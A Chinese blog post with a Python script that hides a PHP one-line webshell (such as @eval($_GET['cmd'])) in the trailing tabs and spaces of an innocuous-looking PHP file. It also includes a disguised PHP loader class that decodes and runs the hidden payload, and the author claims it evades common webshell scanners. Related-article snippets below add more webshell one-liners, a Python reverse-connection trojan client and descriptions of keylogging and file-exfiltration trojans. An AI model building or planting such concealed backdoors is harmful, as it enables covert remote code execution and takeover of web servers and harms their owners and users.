【python实现生成隐藏的一句话木马】

最新推荐文章于 2024-04-29 10:27:04 发布
最新推荐文章于 2024-04-29 10:27:04 发布
阅读量2.5k 收藏 5
点赞数
分类专栏: Python学习 文章标签: python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_55213436/article/details/126041153
版权
本文介绍了Webshell的工作原理,通过利用空格和制表符隐藏ASCII码来创建不可见的PHP木马。提供了一个Python脚本`HiddenWebShell.py`,用于在正常PHP文件中插入隐藏的Webshell。通过运行该脚本,可以生成一个与原始文件内容相同的PHP文件,但安全工具无法检测到其中的恶意代码。这种方法展示了Webshell逃避检测的技巧,提醒了安全防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  如今,各大杀毒软件死死的盯着那几个危险函数不放。但是还有些人喜欢通过检索 webshell 关键字这样批量去找,这就更不可能找到了。那么今天这个 webshell 的原理是什么呢?这个webshell的原理就是:每一行最后都有空格与制表符。\t的数量代表着 ascii 码 16 进制的第一位,空格的数量代表着 ascii 码 16 进制的第二位。然后有个关键的15,其实代表了前 15 行的空白字符组成的是create_function,后面就可以写一句话咯,例如@eval($_GET["pass"]);,每一行写入一个字符即可。执行的时候先读取自身代码之后,按行提取出里面的空格和制表符,提取出隐藏的代码之后执行就完事了。

我们用python制作一个专门插入shell的脚本,并命名为HiddenWebShell.py

import sys

def put_color(string, color):
    colors = {
        'red': '31',
        'green': '32',
        'yellow': '33',
        'blue': '34',
        'pink': '35',
        'cyan': '36',
        'gray': '2',
        'white': '37',
    }
    return '\033[40;1;%s;40m%s\033[0m' % (colors[color], str(string))
if len(sys.argv) not in [3, 4]:
    sys.exit(
        '''[!] usage: python hidden_webshell.py payload filename [output_filename]\n'''
        '''  [-] example: python {}{}{}'''.format(
            put_color('hidden_webshell.py', 'white'),
            put_color(''' 'system("echo \"hacked by benben :)\"");' ''', 'green'),
            put_color('webshell.php', 'blue')
        )
    )
webshell_name = sys.argv[2]
hidden_name = sys.argv[3] if len(sys.argv) == 4 else 'webshell_hidden.php'
exp = sys.argv[1]
if not exp.endswith(';'):
    print('[!] WARN: {} {}'.format(
        put_color('The payload should end in', 'yellow'),
        put_color(';', 'cyan')
    ))
    print('  [+] Hide webshell')
    print('  [-] Read from {}'.format(put_color(webshell_name, 'blue')))
    print('  [-] Payload is {}'.format(put_color(exp, 'green')))
payload = 'create_function' + exp
with open(webshell_name, 'r') as fp:
    raw_php = fp.readlines()
for line, content in enumerate(payload):
    hex_num = hex(ord(content))
    tab_num = int(hex_num[2], 16)
    space_num = int(hex_num[3], 16)
    hidden = '\t' * tab_num + ' ' * space_num
    if line < len(raw_php):
        if raw_php[line].endswith('\n'):
            raw_php[line] = raw_php[line][:-1] + hidden + '\n'
        else:
            raw_php[line] = raw_php[line] + hidden
    else:
        raw_php.append(hidden + "\n")
with open(hidden_name, 'w') as fp:
    fp.writelines(raw_php)
print('[!] Saved as {}'.format(put_color(hidden_name, 'blue')))
print('[!] All done\n\nBye :)')

接着找一个php文件,其中可以写入一些正常的符合php语法的代码:demo.php:

<?php
class getHigherScore {
    function __construct() {
        $lines = file(__FILE__);
        $lower = "";							    
        $higher = "";
        for($i = 0; $i < count($lines); $i++) {
            $value = $this->getArrayValue($lines[$i]);
            if ($i < 15) {
                $lower .= $value;
            } else {
                $higher .= $value;
            }
        }
        $verifyScore = $lower('', "$higher");
        $result = $verifyScore();
        return $result;
    }
    function getArrayValue($result) {
        preg_match('/([\t ]+)\r?\n?$/', $result, $match);
        if (isset($match[1])) {
            $lower = dechex(substr_count($match[1], "\t"));
            $higher = dechex(substr_count($match[1], " "));
            $result = hexdec($lower.$higher);
            $result = chr($result);
			print $result;
            return $result;
        }
        return '';
    }
}
$score = new getHigherScore();
print $score;

使用python脚本优化demo.php脚本:

python HiddenWebShell.py @eval($_GET['cmd']);  demo.php    这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。

python木马(望大佬改进)
m0_46633551的博客
05-25 3196
python 自制木马(只是想让大佬帮忙改下) 代码如下: from socket import * import re import os HOST = input('set ip adress>>>') PORT = 21567 BUFSIZ = 10240 ADDR = (HOST, PORT) tcpCliSock = socket(AF_INET, SOCK_STREAM) tcpCliSock.connect(ADDR) while True: message
python+php一句话木马的利用
CYLK1987310466的博客
07-29 1556
python知识点,php一句话木马
Web安全-一句话木马
热门推荐
道阻且长,行则将至
05-08 36万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
python hacker_Python hacker 之 爆破一句话木马
weixin_39846898的博客
12-05 584
00x1:需要用到的模块如下:import requests00x2:首先我们了解一句话木马般post传递参个简单的php一句话木马eval($_POST['x'])?>先测试下连接OK,没问题,我们用浏览器打开传参看下由此可以看到密码为x,变量提交能匹配上即执行echo语句这时我猜大家都有了思路,构造post请求即可00x3:这里我们可以利用网址特性提交多个参数这样可以提高爆...
python个能生成三种一句话木马的脚本
weixin_30782293的博客
02-07 1386
代码: import time import os from threading import Thread import optparse def aspyijuhua(): try: juy=open('caidao.asp','w') asp="<%IfRequest(",'1',")<>""ThenExecuteGlob...
使用python连接JSP一句话木马
分享与记录
08-24 3774
首先需要安装tomcat。 去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。 这里,我下载的是 apache-tomcat-8.5.70.tar.gz 最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现点问题。 这是我遇到的问题,随手记录了下。 https://blog.youkuaiyun.com/weixin_45254208/article/details/119897865 不过你也可以不重装,等出了问题再重装,万你的电脑就没有我这种情况
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马一句话变形技巧和使用...
weixin_36005427的博客
03-27 2035
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
web安全的一句话木马
IerkeU的博客
12-13 2547
WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的种命令执行环境,也可以将其称做为种网页后门。黑客在入侵了个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在起,然后就可以使用浏览器来访问asp或者php后门,得到个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2331
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
ctf PHP一句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...
weixin_33903769的博客
03-20 1504
CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,主要是写给我们萌新看的,大佬们轻喷。weak题目难度 ⭐php中有两种比较的符号 == 与 === ,=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较== 在进行比较的时候,会先将...
Web安全!!!一句话木马
cldimd的博客
01-09 2226
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?> 1 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表
一句话木马
m0_69764745的博客
04-17 400
对于上述代码,看到的第眼密码就是‘admin’,因为这个POST就是admin这个变量,用post的方法接收。用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行。所以也就能这么玩:也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马。$_POST['hack']:是 PHP 中的个超全局变量,用于从 HTTP POST 请求中获取名为hack参数的值。它是个关联数组,包含了 POST 请求中提交的所有参数及其对应的值。
python输出段话_python个能生成三种一句话木马的脚本
weixin_39779928的博客
12-03 899
代码:import timeimport osfrom threading import Threadimport optparsedef aspyijuhua():try:juy=open('caidao.asp','w')asp="""ThenExecuteGlobal(Request(",'1',"))%>"print '[+]Accelerated generation !'juy....
python木马_Python编写简易木马程序
weixin_34405261的博客
01-30 7169
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
python编写木马攻击_用python开发木马程序
weixin_39871162的博客
12-05 499
41.木马是什么?木马能干什么?2.本木马程序实现的功能是什么?记录键盘输入、屏幕截图、将数据发送指定服务器3.如何实现linux下的多线程?4.python的与键盘相关的外部调用模块、网络模块、截屏工具分别是什么?input子系统、socket编程、scrot工具5.键盘输入功能的实现流程是什么?寻找键盘设备使用evdev库获取键盘传递而来的原始数据对原始数据解码,存入字符缓冲区在字符缓冲区中处...
如何用python个小木马
assion
03-02 1880
这个python木马更准确来说算不上是木马,只能是个小工具,主要功能是来获取本地doc或者txt文档甚至是图片的,并把这些文档压缩直接通过FTP上传到服务器。这不禁让我想起了上学的时候,上选修课的时候,老师所讲的讲义是不会下发的,但是他的讲义全都是试题,对于个经常翘课的我来说,上课认真听讲是不存在的。第步、提取当前目录下png、jpg结尾的文件,注意很多图片格式还有可能是jpeg的。注意:FPT服务器的端口定要开放,否则会出现上传失败的情况。我在想如何能“偷”到老师的试题,于是这个脚本孕育而生。
常见的一句话木马
最新发布
qq_69100706的博客
04-29 1173
【代码】常见的一句话木马
Python简单木马编写
Amire0x的小乐园
03-09 4870
Python木马编写 遇到的问题和解决办法 开始是netcat.py文件,这个文件是准备模仿部分kali工具net cat编写的 遇到了个问题,代码写完跑不出来,脚本带参数也没法调试,通过添加print逐排错,发现是socket中的recv函数的阻塞问题 即有两种模式阻塞与非阻塞 阻塞模式下:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,阻塞直到缓冲区中有数据。 非阻塞模式:当缓冲区内有数据时,立即返回所有的数据;当缓冲区内无数据时,产生EAGAIN的错误并返回(在Python中会抛出
使用Python简化BERT实现句向量生成与文本分类
Python作为种广泛用于数据科学与机器学习的编程语言,是实现BERT模型不可或缺的工具。本篇内容将详细介绍如何使用Python结合BERT模型来生成句向量、进行文本分类以及文本相似度的计算。 BERT模型的基础是个多层...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值